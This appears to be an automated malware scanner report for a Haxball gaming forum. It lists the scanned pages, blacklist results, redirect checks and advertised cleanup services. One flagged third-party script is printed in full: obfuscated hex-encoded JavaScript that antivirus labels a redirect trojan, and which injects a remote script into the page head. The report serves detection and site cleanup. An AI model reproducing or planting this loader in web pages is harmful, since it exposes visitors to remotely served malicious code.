New scan:

Malware Scanner report for haxball-galaxy.forumotion.cc

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "haxball-galaxy.forumotion.cc" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/5
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=haxball-galaxy.forumotion.cc

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://haxball-galaxy.forumotion.cc/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://haxball-galaxy.forumotion.cc/
200 OK
Content-Length: 82544
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://illiweb.com/rsc/60/frm/lang/en.js
200 OK
Content-Length: 67924
Content-Type: application/x-javascript
clean
http://partner.googleadservices.com/gampad/google_service.js
200 OK
Content-Length: 3868
Content-Type: text/javascript
clean
http://api.leaguerepublic.com/l/client/api/cs1.js
200 OK
Content-Length: 976
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var _0x679b=["\x6E\x75\x6D\x43\x6F\x64\x65\x53\x6E\x69\x70\x70\x65\x74\x73","\x72\x61\x6E\x64\x6F\x6D","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x70\x69\x2E\x6C\x65\x61\x67\x75\x65\x72\x65\x70\x75\x62\x6C\x69\x63\x2E\x63\x6F\x6D\x2F\x6C\x2F\x6A\x73\x2F\x63\x73\x31\x2E\x68\x74\x6D\x6C\x3F\x63\x73\x3D","\x26\x72\x61\x6E\x64\x6F\x6D\x3D","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];if(window[_0x679b[0]]==undefined){window[_0x679b[0]]=1;} else {window[_0x679b[0]]++;} ;if(window[_0x679b[0]]<=12){var randno=Math[_0x679b[1]]();var el=document[_0x679b[3]](_0x679b[2]);el[_0x679b[4]]=_0x679b[5]+lrcode+_0x679b[6]+randno;el[_0x679b[7]]=_0x679b[8];document[_0x679b[11]](_0x679b[10])[0][_0x679b[9]](el);} ;

Antivirus reports:

Sophos
Troj/JSRedir-DO

http://haxball-galaxy.forumotion.cc/h2-live-stream
200 OK
Content-Length: 29682
Content-Type: text/html
clean
http://haxball-galaxy.forumotion.cc/faq
200 OK
Content-Length: 57030
Content-Type: text/html
clean
http://illiweb.com/rsc/60/frm/collapsible_faq.js
200 OK
Content-Length: 1103
Content-Type: application/x-javascript
clean
http://haxball-galaxy.forumotion.cc/search
200 OK
Content-Length: 53111
Content-Type: text/html
clean
http://illiweb.com/rsc/60/frm/extendedview.js
200 OK
Content-Length: 1445
Content-Type: application/x-javascript
clean
http://haxball-galaxy.forumotion.cc/memberlist
200 OK
Content-Length: 66994
Content-Type: text/html
clean
http://haxball-galaxy.forumotion.cc/groups
200 OK
Content-Length: 31684
Content-Type: text/html
clean
http://haxball-galaxy.forumotion.cc/register
200 OK
Content-Length: 32591
Content-Type: text/html
clean
http://haxball-galaxy.forumotion.cc/login
200 OK
Content-Length: 31488
Content-Type: text/html
clean
http://haxball-galaxy.forumotion.cc/privmsg?folder=inbox
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 25 Jul 2014 16:33:39 GMT
Location: http://haxball-galaxy.forumotion.cc/login?redirect=%2Fprivmsg%3Ffolder%3Dinbox
Content-Length: 0
clean
http://haxball-galaxy.forumotion.cc/login?redirect=%2fprivmsg%3ffolder%3dinbox
200 OK
Content-Length: 31846
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Jul 2014 16:33:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Fri, 25 Jul 2014 00:00:00 GMT
Last-Modified: Fri, 25 Jul 2014 16:33:25 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Second query (visit from search engine):
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc
Referer: http://www.google.com/search?q=haxball-galaxy.forumotion.cc

Result:
The result is similar to the first query. There are no suspicious redirects found.